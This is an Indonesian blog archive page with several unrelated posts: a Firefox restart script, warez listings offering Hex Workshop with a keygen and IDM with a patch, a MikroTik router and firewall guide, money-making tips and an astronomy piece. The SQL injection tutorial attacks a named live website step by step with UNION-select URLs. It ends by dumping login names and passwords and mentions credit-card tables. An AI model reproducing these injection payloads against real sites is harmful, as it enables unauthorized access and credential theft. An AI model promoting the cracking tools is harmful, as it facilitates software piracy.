Pages

03 December 2010

How to safe restart firefox in Linux

Hi guys:

How to restart firefox? all old session can be restored.
I am writing one script to install my plugin to firefox, right now I failed to restore old sessions.

Here is my code, any comments or suggestion are appreciated.
 
RestartBrowser()
{
bin="firefox"
PID_LIST=$(ps -ef |grep $bin |grep -v "grep" |awk '{print $2}')
local result=$?
local PID_NUM=0

local restart=0
for pid in $PID_LIST
do
if [ $PID_NUM -eq 0 ]
then
echo "Restart Firefox to complete your change"
echo "Press Enter key to restart firefox, any other key to quit"
key=""
read -s -n 1 key
X="X"
if [ X$key !="X" ]
then
restart=$FALSE
echo "Cancel restart firefox"
break
else
restart=$TRUE
fi
fi
kill -9 $pid
result=$?
if [ $result -ne 0 ]
then
echo $(date) ":" "Failed to kill firefox pid:$pid"
fi
sleep 3
#restart web browser
export DISPLAY=":0.0"
firefox &
result=$?
PID_NUM=$[ $PID_NUM + 1 ]
echo $(date) ":" "Restart firefox $pid"
done
if [ $PID_NUM -eq 0 ]
then
result=0
echo $(date) ":" "No firefox has been restarted"
fi
echo $(date) ":" "Enter RestartBrowser firefox restart:$restart, result:$result"
return $result
}
Baca Selengkapnya... How to safe restart firefox in Linux

Hex Workshop v6-0-1-4603 + Keygen


The Hex Workshop Hex Editor by BreakPoint Software is a complete set of hexadecimal development tools for Microsoft Windows 2000 and later. Hex Workshop combines advanced binary editing and data interpretation with the ease and flexibility of a modern word processor. With the Hex Workshop, you can edit, cut, copy, paste, insert, fill and delete binary data. You can also work with data in its native structure and data types using our integrated structure view and smart bookmarks. Data editing is quick and easy with our extensive features that allow you to: jump to file or sector location, find or replace data, perform arithmetic and logical operations, binary compare files, generate checksums and digests, view character distributions and export data to RTF or HTML for publishing.

The Hex Workshop Hex Editor is available at a retail price of $89.95 (with volume and academic discounts and site licenses available).

Key Features:

Rich Feature Set
Highly Customizable User Interface
Data Interpretation and Parsing
Integrated Binary Comparison

Rich Feature Set

Hex Workshop features a broad and powerful set of features ranging from the ability to color map data sequences to the interpretation of data though our integrated structure viewer and smart bookmarks. Our many features include: binary data editing, importing and exporting blocks of data, searching for data by hex strings, text, Unicode, bitmasks, or decimal values, viewing character distributions, sector editing, embedded data operations, binary file comparison, and import/export capabilities.

Highly Customizable User Interface

Hex Workshop allows users to customize the look of the main editor window through highly specific color definitions for the data and backgrounds and also through the ability to define how and what data will be displayed. Users can adjust the grouping of hex data, the number of bytes display per line, offset lengths, offset bases, etc. Windows can also be docked or pinned to maximize your editing workspace.



Integrated tools allow users to color code and tag data within the editor. For example, while viewing a structure in Hex Workshop, users are able to color graphically see the data ranges of structure members. All color coding is user definable.

Data Interpretation and Parsing

Three integrated tools are available to help parse and combine data within Hex Workshop. The Structure Viewer applies C-style structures to data within the editor and allows the user to visually view and edit that data. Smart Bookmarks allow users to add bookmarks to a file with functions, mathematical operations, and data types. Users can view and edit both the bookmark and the bookmark's value. Color maps allow users to apply color attributes to hex sequences or character ranges to help identify data within a file.

Integrated Binary Comparison

Integrated resynchronizing binary comparisons allow users to compare binary files and review each difference. Starting offsets, lengths, and compare parameters, and color renderings are all user-settable.

  

Technical Specifications

Software Requirements:

Microsoft Windows 2000 or later.
Administrative access for installation, registration, and sector editing.

Hardware Requirements:

1 GHz x86 processor
512 MB of system memory
20 MB of available disk space

More Information

http://www.hexworkshop.com/ 

 

Download : Hex Workshop.v6.0.1 And Incl.Keyfilemaker

Baca Selengkapnya... Hex Workshop v6-0-1-4603 + Keygen

Internet Download Manager 6.03 + Patch


Internet Download Manager has a smart download logic accelerator that features intelligent dynamic file segmentation and safe multipart downloading technology to accelerate your downloads. Unlike other download accelerators and managers that segment files before downloading starts, Internet Download Manager segments downloaded files dynamically during download process. Internet Download Manager reuses available connections without additional connect and login stages to achieve better acceleration performance.
Internet Download Manager supports proxy servers, ftp and http protocols, firewalls, redirects, cookies, authorization, MP3 audio and MPEG video content processing. IDM integrates seamlessly into Microsoft Internet Explorer, Netscape, MSN Explorer, AOL, Opera, Mozilla, Mozilla Firefox, Mozilla Firebird, Avant Browser, MyIE2, and all other popular browsers to automatically handle yourdownloads.
You can also drag and drop files, or use Internet Download Manager from command line. Internet Download Manager can dial your modem at the set time, download the files you want, then hang up or even shut down your computer when it's done.

Other features include multilingual support, zip preview, download categories, scheduler pro, sounds on different events, HTTPS support, queue processor, html help and tutorial, enhanced virus protection on download completion, progressive downloading with quotas (useful for connections that use some kind of fair access policy or FAP like Direcway, Direct PC, Hughes, etc.), built-in download accelerator, and many others.

Main Features:
• All popular browsers and applications are supported! Internet Download Manager has been tested with the following browsers: Internet Explorer, MSN Explorer, AOL, Netscape Communicator, Netscape 6, Netscape 7, Mozilla, Mozilla Firefox, Mozilla Firebird, Opera, NetCaptor, UltraBrowser, Slim Browser, Avant Browser, MyIE2, Optimal Desktop, Ace Explorer, Advanced Browser, 27 Tools-in-1 Wichio Browser, WindowSurfer, 550Access Browser, FineBrowser Freeware, Kopassa Browser, Fast Browser Pro, Enigma Browser, GoSuRF, K-Meleon, Smart Explorer, The Off By One Web Browser, Smartalec Voyager, CrystalPort AppCapture, The Family Browser, XANA Web Browser, Bluto, AutoSurf, 32bit Web Browser, BrowseMan, WrestlingBrowser, Eminem Browser, UltraBrowser, Cygsoft LDAP Browser, and Net M@nager.Internet Download Manager supports all versions of popular browsers, and can be integrated into any 3rd party Internet applications.
• Easy downloading with one click. When you click on a download link in a browser, IDM will take over the download and accelerate it. IDM supports HTTP, FTP, HTTPS and MMS protocols.
• Download Speed Acceleration. Internet Download Manager can accelerate downloads by up to 5 times due to its intelligent dynamic file segmentation technology. Unlike other download managers and accelerators Internet Download Manager segments downloaded files dynamically during download process and reuses available connections without additional connect and login stages to achieve best acceleration performance.
• Download Resume. Internet Download Manager will resume unfinished download from the place where they left off.
• YouTube grabber. Internet Download Manager can grab FLV videos from popular sites like YouTube, MySpaceTV, and Google Video.
• Simple installation wizard. Quick and easy installation program will make necessary settings for you, and check your connection at the end to ensure trouble free installation of Internet Download Manager
• Drag and Drop. You may simply drag and drop links to IDM, and drag and drop downloaded files out of Internet Download Manager.
• Automatic Antivirus checking. Antivirus checking makes your downloads free from viruses and trojans.
• Advanced Browser Integration. When enabled, the feature can be used to catch any download from any application. None of download managers have this feature.
• Built-in Scheduler. Internet Download Manager can connect to the Internet at a set time, download the files you want, disconnect, or shut down your computer when it's done.
• IDM includes web site spider and grabber. IDM downloads all required files that are specified with filters from web sites, for example all pictures from a web site, or subsets of web sites, or complete web sites for offline browsing. It's possible to schedule multiple grabber projects to run them once at a specified time, stop them at a specified time, or run periodically to synchronize changes.
• IDM supports many types of proxy servers. For example, IDM works with Microsoft ISA, and FTP proxy servers.
• IDM supports main authentication protocols: Basic, Negotiate, NTLM, and Keberos. Thus IDM can access many Internet and proxy servers using login name and password.
• Download All feature. IDM can add all downloads linked to the current page. It's easy to download multiple files with this feature.
• Customizable Interface. You may choose the order, and what buttons and columns appear on the main IDM window.
• Download Categories. Internet Download Manager can be used to organize downloads automatically using defined download categories.
• Quick Update Feature. Quick update may check for new versions of IDM and update IDM once per week.
• Download limits. Progressive downloading with quotas feature. The feature is useful for connections that use some kind of fair access policy (or FAP) like Direcway, Direct PC, Hughes, etc.
• IDM is multilingual. IDM is translated to Albanian, Arabic, Azerbaijan, Bosnian, Bulgarian, Chinese, Croatian, Czech, Danish, Dutch, Farsi, French, German, Greek, Hebrew, Hungarian, Italian, Japanese, Korean, Lithuanian, Macedonian, Norwegian, Polish, Portuguese, Romanian, Russian, Serbian, Slovak, Slovenian, Spanish, Thai, Turkish, and Uzbek languages.

What's new in version 6.03 beta build 3 (Oct 30, 2010):
* Fixed BSOD related bugs
* Improved advanced integration compatibility with AVG and Avast Internet Security

Download :

Iinternet Download Manager 6.03 + Patch 
Baca Selengkapnya... Internet Download Manager 6.03 + Patch

RSA for Digital Signatures

Thank's To HaNJiaN JaN

Download : RSA for Digital Signatures 
                   .NET Framework 2.0

Ragard's
IsTeam
http://thebigsecurity.com
Baca Selengkapnya... RSA for Digital Signatures

SETTING MIKROTIK

SETTING MICROTIK
pilihlah paket – paket dibawah ini untuk install OS Microtik :
System, dhcp, Advance Tools, RouTing, Security, Web – Proxy.
ganti nama system sesuai dengan selera anda :
[admin@microtik] > system identity set name=warnet
Selanjutnya promt shell akan berubah menjadi :
Seperti yg anda inginkan :
[admin@warnet] >
Ubahlah Password OS microtik anda dengan cara :
[admin@warnet] >user set admin password=………………………………
aktivkan kedua Ethernet pada PC yang telah anda install OS Microtik :
[admin@warnet] >interface ethernet enable ether1
[admin@warnet] >interface ethernet enable ether2
Berikan nama pada kedua ethernet untuk memudahkan konfigurasi :
[admin@warnet] >interface Ethernet set ether1 name=modem =====è Ethernet yg utk modem
[admin@warnet] >interface ethernet set ether2 name=local ===è Ethernet yg untuk ke HUB
Masukan IP pada kedua landcard :
[admin@warnet] >ip address add interface=modem address= ( Diisi IP address dari ISP ) / netmask
[admin@warnet] >ip address add interface=lokal address= 192.168.0.1/255.255.255.0
masukkan IP gateway yg di berikan dari ISP :
[admin@warnet] > ip route add gateway=10.11.1.1560

SETTING DNS :
[admin@warnet] >ip dns set primary-dns=10.11.155.1secondary-dns=10.11.155.2
setelah itu coba ping semua IP yang telah di setting di atas.

KONFIGURASI FIREWALL DAN NETWORK
ip firewall nat add action=masquerade chain=srcnat
ip firewall filter add chain=input connection-state=invalid action=drop
ip firewall filter add chain=input protocol=udp action=accept
ip firewall filter add chain=input protocol=icmp action=accept
[font=”]/ip firewall filter add chain=input in-interface=(ethernet card yg ke lan) action=accept
/ip firewall filter add chain=input in-interface=(ethernet card yg ke internet) action=accept
ip firewall filter add chain=input action=drop
ip web-proxy set enabled=yes src-address=0.0.0.0. port=8080 hostname=”” yahuu.net=yes parent-proxy=0.0.0.0:0 \
cache-administrator=”webmaster” max-object-size=4096KiB cache-drive=system max-cache-size=unlimited \
max-ram-cache-size=unlimited
ip firewall nat add chain=dstnat protocol=tcp dst-port=80 action=redirect to-ports=3128 /ip firewall nat add in-interface=modem
dst-port=80 protocol=tcp action=redirect
to-ports=3128 chain=dstnat dst-address=!192.168.0.1/24
==================================================
yang 3128 semuanya di ganti 8080 : caranya :
ip web-proxy set enable=yes
/ip web-proxy set port=3128
/ip web-proxy set max-cache-size=3145728 ( 3 kali total ram )
/ip web-proxy set hostname=”proxy.prima”
/ip web-proxy set allow-remote-requests=yes
/ip web-proxy set cache-administrator: “primanet.slawi@yahoo.com
================================================== ==================================================
FILTERING :
http://www.mikrotik.com/testdocs/ros/2.9/ip/filter.php/
ip firewall filter
add chain=input connection-state=invalid action=drop \comment=”Drop Invalid connections”
add chain=input connection-state=established action=accept \comment=”Allow Established connections”
add chain=input protocol=udp action=accept \ comment=”Allow UDP”
add chain=input protocol=icmp action=accept \ comment=”Allow ICMP”
add chain=input src-address=192.168.0.0/24 action=accept \ comment=”Allow access to router from known network”
add chain=input action=drop comment=”Drop anything else”

ANTI VIRUS UTK MICROTIK :
add chain=forward action=jump jump-target=virus comment=”jump to the virus chain” ++++++++++++++++++++++++++++++++++++++++++++++++++ +++++
add chain=forward protocol=icmp comment=”allow ping”add chain=forward protocol=udp comment=”allow udp”add chain=forward action=drop comment=”drop everything else”

================================================== =====
SECURITY ROUTER MICROTIK ANDA :
/ ip firewall filteradd chain=input connection-state=established comment=”Accept established connections”add chain=input connection-state=related comment=”Accept related connections”add chain=input connection-state=invalid action=drop comment=”Drop invalid connections” add chain=input protocol=udp action=accept comment=”UDP” disabled=no add chain=input protocol=icmp limit=50/5s,2 comment=”Allow limited pings” add chain=input protocol=icmp action=drop comment=”Drop excess pings” add chain=input protocol=tcp dst-port=22 comment=”SSH for secure shell”add chain=input protocol=tcp dst-port=8291 comment=”winbox” # Edit these rules to reflect your actual IP addresses! # add chain=input src-address=159.148.172.192/28 comment=”From Mikrotikls network” add chain=input src-address=10.0.0.0/8 comment=”From our private LAN”# End of Edit #add chain=input action=log log-prefix=”DROP INPUT” comment=”Log everything else”add chain=input action=drop comment=”Drop everything else”
“http://wiki.mikrotik.com/wiki/Securing_your_router“
==================================================

SETTING KEAMANAN JARINGAN HANYA UNTUK LOKAL AREA ANDA :
/ip firewall filteradd chain=forward connection-state=established comment=”allow established connections” add chain=forward connection-state=related comment=”allow related connections”add chain=forward connection-state=invalid action=drop comment=”drop invalid connections”
add chain=virus protocol=tcp dst-port=135-139 action=drop comment=”Drop Blaster Worm” add chain=virus protocol=udp dst-port=135-139 action=drop comment=”Drop Messenger Worm” add chain=virus protocol=tcp dst-port=445 action=drop comment=”Drop Blaster Worm” add chain=virus protocol=udp dst-port=445 action=drop comment=”Drop Blaster Worm” add chain=virus protocol=tcp dst-port=593 action=drop comment=”________” add chain=virus protocol=tcp dst-port=1024-1030 action=drop comment=”________” add chain=virus protocol=tcp dst-port=1080 action=drop comment=”Drop MyDoom” add chain=virus protocol=tcp dst-port=1214 action=drop comment=”________” add chain=virus protocol=tcp dst-port=1363 action=drop comment=”ndm requester” add chain=virus protocol=tcp dst-port=1364 action=drop comment=”ndm server” add chain=virus protocol=tcp dst-port=1368 action=drop comment=”screen cast” add chain=virus protocol=tcp dst-port=1373 action=drop comment=”hromgrafx” add chain=virus protocol=tcp dst-port=1377 action=drop comment=”cichlid” add chain=virus protocol=tcp dst-port=1433-1434 action=drop comment=”Worm” add chain=virus protocol=tcp dst-port=2745 action=drop comment=”Bagle Virus” add chain=virus protocol=tcp dst-port=2283 action=drop comment=”Drop Dumaru.Y” add chain=virus protocol=tcp dst-port=2535 action=drop comment=”Drop Beagle” add chain=virus protocol=tcp dst-port=2745 action=drop comment=”Drop Beagle.C-K” add chain=virus protocol=tcp dst-port=3127-3128 action=drop comment=”Drop MyDoom” add chain=virus protocol=tcp dst-port=3410 action=drop comment=”Drop Backdoor OptixPro”add chain=virus protocol=tcp dst-port=4444 action=drop comment=”Worm” add chain=virus protocol=udp dst-port=4444 action=drop comment=”Worm” add chain=virus protocol=tcp dst-port=5554 action=drop comment=”Drop Sasser” add chain=virus protocol=tcp dst-port=8866 action=drop comment=”Drop Beagle.B” add chain=virus protocol=tcp dst-port=9898 action=drop comment=”Drop Dabber.A-B” add chain=virus protocol=tcp dst-port=10000 action=drop comment=”Drop Dumaru.Y” add chain=virus protocol=tcp dst-port=10080 action=drop comment=”Drop MyDoom.B” add chain=virus protocol=tcp dst-port=12345 action=drop comment=”Drop NetBus” add chain=virus protocol=tcp dst-port=17300 action=drop comment=”Drop Kuang2″ add chain=virus protocol=tcp dst-port=27374 action=drop comment=”Drop SubSeven” add chain=virus protocol=tcp dst-port=65506 action=drop comment=”Drop PhatBot, Agobot, Gaobot”
++++++++++++++++++++++++++++++++++++++++++++++++++

++++++++++++++++++++++++++++++++++++++++++++++++++
 #MatikanPort yang Biasa di pakai Spam :
/ip firewall filter add chain=forward dst-port=135-139 protocol=tcp action=drop
/ip firewall filter add chain=forward dst-port=135-139 protocol=udp action=drop
/ip firewall filter add chain=forward dst-port=445 protocol=tcp action=drop
/ip firewall filter add chain=forward dst-port=445 protocol=udp action=drop
/ip firewall filter add chain=forward dst-port=593 protocol=tcp action=drop
/ip firewall filter add chain=forward dst-port=4444 protocol=tcp action=drop
/ip firewall filter add chain=forward dst-port=5554 protocol=tcp action=drop
/ip firewall filter add chain=forward dst-port=9996 protocol=tcp action=drop
/ip firewall filter add chain=forward dst-port=995-999 protocol=udp action=drop
/ip firewall filter add chain=forward dst-port=53 protocol=tcp action=drop
/ip firewall filter add chain=forward dst-port=55 protocol=tcp action=drop
/ip firewall filter add chain=forward dst-p
diatas di cek di websitenya lagi :

http://www.mikrotik.com/documentation/manual_2.7/
http://www.mikrotik.com/docs/ros/2.9/ip/webproxy
lihat di system resource
dan 2/3 dari system resource di gunakan atau di alokasikan untuk : system resource print
************************************************** ******************************************
Graphing /tool graphing set store-every=hour[admin@MikroTik] tool graphing> print store-every: hour[admin@MikroTik] tool graphing> [admin@MikroTik] tool graphing interface> add interface=ether1 \allow-address=192.168.0.0/24 store-on-disk=yes[admin@MikroTik] tool graphing interface> printFlags: X - disabled # INTERFACE ALLOW-ADDRESS STORE-ON-DISK 0 ether1 192.168.0.0/24 yes[admin@MikroTik] tool graphing interface> [admin@VLP InWay] tool graphing> export
# oct/12/2005 09:51:23 by RouterOS 2.9.5
# software id = 1TLC-xxx
#
/ tool graphing
set store-every=5min
/ tool graphing queue
add simple-queue=all allow-address=10.8.2.99/32 store-on-disk=yes allow-target=yes disabled=no
/ tool graphing resource
add allow-address=0.0.0.0/0 store-on-disk=yes disabled=no
/ tool graphing interface
add interface=Inway allow-address=0.0.0.0/0 store-on-disk=yes disabled=no
add interface=LAN allow-address=0.0.0.0/0 store-on-disk=yes disabled=no
add interface=DMZ allow-address=0.0.0.0/0 store-on-disk=yes disabled=no
Baca Selengkapnya... SETTING MIKROTIK

PROXY SQUID di Windows

This summary is not available. Please click here to view the post.
Baca Selengkapnya... PROXY SQUID di Windows

Tips & Trik Mencari Uang Lewat Internet


Author: admin | Filed under: Tips Dan Triks
Dunia internet bukan saja menawarkan informasi dan berita terkini, tapi juga menawarkan keuntungan finansial bagi yang tahu bagaimana memanfaatkan media ini untuk menghasilkan uang. Bagaimana dan seberapa besar keuntungan yang bisa dicapai lewat media ini? Simak lebih lanjut.. Kalau bicara mencari uang di internet, siapa saja bisa melakukannya dan sangat tergantung seberapa keseriusan orang yang ingin mendapatkan uang tersebut dan juga jumlah yang akan dihasilkan. Internet sendiri merupakan media yang dapat dikatakan cukup mudah untuk menghasilkan uang bagi mereka yang mengerti karena banyak sekali peluang untuk itu dan akan semakin bertambah dari hari ke hari. Situs yang ditujukan untuk komersial atau menghasilkan uang sendiri juga sangat banyak di internet saat ini dan bahkan ada situs yang memang dirancang khusus untuk itu. Berikut kami sajikan beberapa cara yang biasanya dilakukan oleh netter untuk mendapatkan uang di internet :
1. Membuat situs untuk iklan, afiliasi dan promosi serta marketing online Cara ini bisa dibilang paling efektif dalam mencari uang di internet dan bebas resiko karena netter hanya butuh situs baik yang gratis ataupun yang bayar sebagai media gratis 24 jam untuk menampilkan iklan seperti Google Adsenseatau menjadikan situsnya sebagai afiliasi untuk promosi penjualan barang dari situs lainnya seperti afiliasi dengan Amazon (situs penjualan buku) di mana netter bisa mendapatkan komisi dari setiap buku yang dibeli oleh netter lainnya yang masuk lewat link dari situs. Kelebihan: bebas resiko dan mudah dilakukan Kekurangan: netter butuh waktu untuk membuat situs dan butuh pengetahuan untuk itu serta harus sering meng-update situs supaya sering dikunjungi netter lainnyaPenghasilan: tergantung dari jumlah “hit” (netter yang mengunjungi situs) per hariContoh situs : adsense.com - amazon.com

2. Menjadi internet trader Cara ini juga cukup efektif bagi yang rajin dan yang hobi belajar trading mata uang (Forex) karena kalau netter sampai menjadi seorang ahli trading, penghasilan yang di dapat juga bisa sangat tinggi dan bisa mendapat ratusan hingga puluhan ribu dollar per-minggu atau per-bulan. Saat inibanyak media yang menyediakan trading gratis untuk belajar dan bahkan bisa mendapatkan uang gratis untuk trading sesungguhnya seperti di Marketiva.

Kelebihan: menjanjikan keuntungan finansial yang sangat besar dan untuk pemula tidak perlu modal awal Kekurangan: butuh waktu untuk belajar dan pengalaman untuk menjadi ahli tradingPenghasilan: tergantung seberapa rajin anda belajar dan kepintaran anda dalam ber-trading. Seorang ahli trading rata-rata bisa mendapatkan profit ribuan hingga ratusan ribu dollar per-minggu Contoh situs: marketiva.com

3. Ber-investasi online Cara ini mengandung resiko (bisa rugi) dan butuh modal awal untuk bisa mendapatkan profit. Untuk berinvestasi online sendiri juga butuh waktu belajar, pengalaman dan harus mengikuti ketentuan investasi baru bisa menikmati profit pada akhirnya. Banyak netter di luar negeri yang hidup dari investasi online ini dan biasanya mereka yang sudah lama berkecimpung atau yang sudah berpengalaman di bidang ini. Kelebihan: cara yang mudah untuk mendapatkan keuntungan karena tidak membutuhkan keahlian apapun asal punya modalKekurangan: berpotensi rugi (kehilangan modal) kalau tidak hati-hati dalam berinvestasi karena banyak investasi yang menipu atau gagal bayar bahkan bangkrut karena salah kelola atau salah manajemen Penghasilan: bervariatif tergantung dari nilai modal investasi dan profit yang dijanjikan

4. Dibayar untuk beraktifitas di internet Cara ini juga bisa dikatakan sangat mudah tapi bisa menghabiskan waktu yang sangat banyak sedangkan profit yang didapat biasanya jumlahnya sedikit dan baru dibayar setelah mencapai jumlah tertentu yang biasanya baru bisa didapat setelah berbulan-bulan. Cara ini biasanya dilakukan oleh netter dengan mendaftarkan diri mereka untuk ikut program membaca e-mail iklan, klik iklan, surfing di internet, posting berita atau blog, memakai search engine yang semuanya biasanya ditawarkan gratis Kelebihan: termasuk cara mudah juga untuk mendapatkan uang dan tidak memerlukan modal awal berupa uang.

Kekurangan: cara ini memerlukan waktu yang cukup banyak dan pada umumnya cukup membuang waktu, belum lagi kalau ada program yang tidak membayarPenghasilan: tidak efektif dan jumlah uang yang dihasilkan biasanya sangat kecilContoh situs: mylot.com , Flixya

5. Jualan produk, barang dan jasa lewat internet (e-commerce) Cara ini biasanya dilakukan oleh netter yang mempunyai produk, barang dan jasa yang nilainya bisa menjual dan menghasilkan uang. Mereka biasanya membuat situs yang bisa mendukung dan memberikan informasi tentang apa yang akan dijual mereka. Kelebihan: termasuk cara efektif untuk menghasilkan uang lewat penjualan online dan promosi produk sekaligus Kekurangan: butuh produk, barang dan jasa serta modal, pengetahuan mengelola situs dan juga sekuriti untuk situs Penghasilan: bervariatif tergantung dari nilai produk, barang dan jasa serta daya dan jumlah pembeli dari pengunjung situs Kesimpulan
Kalau seorang netter bisa memanfaatkan 3 dari 5 cara di atas secara efektif, saya yakin dia akan bisa memperoleh jumlah finansial yang memadai dan jumlahnya akan makin bertambah dari hari ke hari. Memang masih ada beberapa cara yang bisa dilakukan orang atau netter untuk bisa mendapatkan uang dan kelima cara di atas hanya mewakili cara yang pada umumnya dilakukan oleh orang atau netter untuk mendapatkan uang di internet. Modal utama anda sebenarnya cuma butuh komputer yang terkoneksi ke internet untuk bisa menghasilkan uang walau beberapa cara di atas juga memerlukan modal awal untuk supaya bisa memulainya. Kecepatan koneksi mungkin juga akan sangat berpengaruh dalam beberapa hal untuk bisa memperlancar usaha anda untuk mendapatkan uang di internet. Selama mencoba!
Sumber : Ketok.com & pakmin.co.cc
Baca Selengkapnya... Tips & Trik Mencari Uang Lewat Internet

Cara bypass mikrotik di OS Windows

Oke langsung aja yah nonton videonya ^_^


http://d4wfl1n.megabyet.net/vid/mikrotik.swf
Baca Selengkapnya... Cara bypass mikrotik di OS Windows

Tutorial SQL Injection

situs yang interaktif dengan pengunjung yang banyak terdapat "database" didalamnya
ada "INFORMATION_SCHEMA" yang menangani table "INFORMATION_SCHEMA.TABLES" yang namanya "table_name"
dan yang manangani column "INFORMATION_SCHEMA.COLUMNS" yang namanya "column_name"

cara injection ada 2 macam yaitu :

1. melalui form input
2. melalui url
yang kita bahas disini adalah cara inject melalui url saja!

Command yang sering di gunakan :
1. ORDER BY = untuk mengetahui jumlah column
2. UNION SELECT = untuk mengambil informasi dari table atau column
3. AND = untuk membandingkan 2 kondisi true atau false
4. OR = untuk menentukan 1 kondisi saja
5. -- = untuk menutup perintah
6. + = untuk spasi
7. ' = karakter evil
8. HAVING = untuk menampilkan error
9. DATABASE() = untuk mengetahui nama database
10. USER() = untuk mengetahui nama user database
11. DATADIR() = untuk mengetahui posisi letak database
12. CONCAT = untuk menggabungkan 2 column atau lebih
13. GROUP_CONCAT = untuk menampilkan group dari gabungan column
14. CONCAT_WS = sama seperti concat
15. FROM = mengambil data dari
16. UPDATE = mengubah data yang telah ada
17. @@servername = menampilan nama server
18. @@language = menampilkan bahasa ysng di gunanakan website
19. @@pid = menampilkan nomor proses
20. load_file(nama_file_yg_telah_di_ubah_ke_hexa_SQL) = untuk menmpilkan isi file

Skema attack
"Camera roll......."
"Action......."


‎1. Cek Vuln apa gak
 http://www.designemdia.com.br/opiniao/read.php?id=1' 

atau

http://www.designemdia.com.br/opiniao/read.php?id=-1

kalau error atau tampilannya jadi blank berarti vuln
Injection = On


2. Cari angka ajaibnya (batasan kolom nya)

http://www.designemdia.com.br/opiniao/read.php?id=1+order+by+1--



http://www.designemdia.com.br/opiniao/read.php?id=1+order+by+2--


http://www.designemdia.com.br/opiniao/read.php?id=1+order+by+3--

http://www.designemdia.com.br/opiniao/read.php?id=1+order+by+4--

trussin sampe ketemu error
kalau dah ketemu error berarti batas angka ajaibnya sampai di angka order by "N" sebelum error

3. Misal angka error oder by "N" nya di "9 " berarti angka ajaibnya jadi kek gini

http://www.designemdia.com.br/opiniao/read.php?id=-1+union+select+1%2C2%2C3%2C4%2C5%2C6%2C7%2C8--

Keluar deh tuh angka ajaibnya yg di jadiin patokan buat di... tusbol wakakakkakkk

4. Selanjutnya cek versi MYSQL nya melalui angka ajaib yg keluar td

karna angka ajaibnya angka "5" kita ganti dengan "version()" tuk mengecek versi MYSQL nya ^_^

http://www.designemdia.com.br/opiniao/read.php?id=-1+union+select+1%2C2%2C3%...2C4%2Cversion%28%29%2C6%2C7%2C8--


5. cari nama database nya

http://www.designemdia.com.br/opiniao/read.php?id=-1+union+select+1%2C2%2C3%2C4%2Cdatabase%28%29%2C6%2C7%2C8--

6. Cari nama table nya

http://www.designemdia.com.br/opiniao/read.php?id=-1+union+select+1%2C2%2C3%2C4%2Ctable_name%2C6%2C7%2C8+from+information_schema.tables+where+table_schema%3Ddatabase%28%29--

Kalo kek di atas kan terbatas jadi cuman sat...u tabel yg klihatan ^_^
kita bisa tambahkan "group_concat"

http://www.designemdia.com.br/opiniao/read.php?id=-1+union+select+1%2C2%2C3%2C4%2Cgroup_concat%28table_name%29%2C6%2C7%2C8+from+information_schema.tables+where+table_schema%3Ddatabase%28%29--

atau bisa juga pake cara yg lain tp lama

http://www.designemdia.com.br/opiniao/read.php?id=-1+union+select+1%2C2%2C3%2C4%2Ctable_name%2C6%2C7%2C8+from+information_schema.tables+where+table_schema%3Ddatabase() limi 0,1--

http://www.designemdia.com.br/opiniao/read.php?id=-1+union+select+1%2C2%2C3%2C4%2Ctable_name%2C6%2C7%2C8+from+information_schema.tables+where+table_schema%3Ddatabase() limi 1,1--

http://www.designemdia.com.br/opiniao/read.php?id=-1+union+select+1%2C2%2C3%2C4%2Ctable_name%2C6%2C7%2C8+from+information_schema.tables+where+table_schema%3Ddatabase() limi 2,1--                  <= dan seterusnya

sampai semu nama-nama tablenya muncul dan jgn lupa catat tuh nama-nama tabel nya ^_^


7. Nah ini nih step yg paling di tunggu-tunggu

pilih salah satu table yg mau di tampiling ckckckckckckckkk Oops
maksudnya yg mau di tampilkan nama-nama kolom nya ^_^
misal : tbl_cc_deatils <= buat cc
...user <= buat pp
atau login <= buat login adminnya ^_^

Ok di sini saya pilih "login"



http://www.designemdia.com.br/opiniao/read.php?id=-1+union+select+1%2C2%2C3%2C4%2Cgroup_concat%28column_name%29%2C6%2C7%2C8+from+information_schema.columns+where+table_name%3D%27login%27--

Oops kok error yah ???
harus di convert dolo ke hexa ^_^
jadi nanti URL nya kek gini ^_^

http://www.designemdia.com.br/opiniao/read.php?id=-1+union+select+1%2C2%2C3%2C4%2Cgroup_concat%28column_name%29%2C6%2C7%2C8+from+information_schema.columns+where+table_name%3D0x6c6f67696e--


8. skarang tampilkan record dari kolom login tadi ^_^

http://www.designemdia.com.br/opiniao/read.php?id=-1+union+select+1%2C2%2C3%2C4%2Cconcat_ws%280x3a%2Clogin%2Cnome%2Csenha%2Cnivel%29%2C6%2C7%2C8+from+login

selanjutnya terserah anda
Baca Selengkapnya... Tutorial SQL Injection

02 December 2010

Misteri Peralihan Siang & Malam

Teknik okultasi bintang atau "Star occultation" ini digunakan untuk meneliti atmosfir suatu planet yang semuanya berada di tata surya kita, termasuk planet bumi. Sejak tahun 2002 tidak kurang dari 400 bintang menjadi objek okultasi tiap hari pada berbagai posisi di atmosfir bumi untuk mempelajari efek material bercahaya dan dampaknya terhadap planet yang bersangkutan.

Teknik ini digunakan untuk menguak apa yang tersembunyi dibalik ketebalan atmosfir suatu planet, termasuk atmosfir bumi. Okultasi ini adalah teknik untuk mengukur cahaya atau gelombang dari suatu bintang yang dilenturkan oleh atmosfir suatu planet, pada waktu bintang tersebut sudah terbenam pada planet yang bersangkutan.

Sebagaimana yang diketahui, pada waktu masih di atas ufuk maka seluruh cahaya dari bintang tersebut akan mengarah ke bawah, yaitu kearah planet. Tapi ketika terbenam dibawah ufuk, walaupun masih memancarkan cahayanya, tetapi cahaya yang mengarah ke bawah semuanya hilang ditelan kegelapan angkasa luar, sebagian kecil cahaya yang mengarah ke planet tentu saja akan diserap oleh planet yang bersangkutan.

Yang tersisa adalah gelombang atau cahaya yang dilenturkan ke arah sebaliknya tepat seperti ketika malam tiba di bumi, dan malam permukaan paparan (exposure) energi yang dilenturkan oleh permukaan bumi dari matahari yang sudah terbenam.

Paparan ini mengarah ke angkasa, dan karena sudah mengalami atau melalui ketebalan atmosfir planet tersebut, maka paparan gelombang tersebut sudah mengalami penapisan (filtering) dari atmosfir planet yang bersangkutan.

Gelombang tersebut akan mengalami penyerapan (absorption), emisi (emission) atau radiasi kembali (re-radiation), pada panjang-gelombang yang relevan dengan bahan yang terkandung dalam atmosfir dalam planet yang bersangkutan.

Dengan menggunakan teknik spektroskopi yang biasa dipakai dalam gelombang-gelombang yang dipancarkan dari tata-surya atau dari galaksi atau dari alam yang lain di dalam alam semesta ini.

Dengan deteksi ini dapat diketahui bahan atau zat kimia apa saja yang ada di suatu bintang dan bahan apa saja yang ada diantaranya yang dilewatinya.

Material-material itu bisa saja merupakan produk baru industri yang laku secara komersial akan tetapi dampaknya tehadap lapisan ozon belum diketahui dengan pasti.

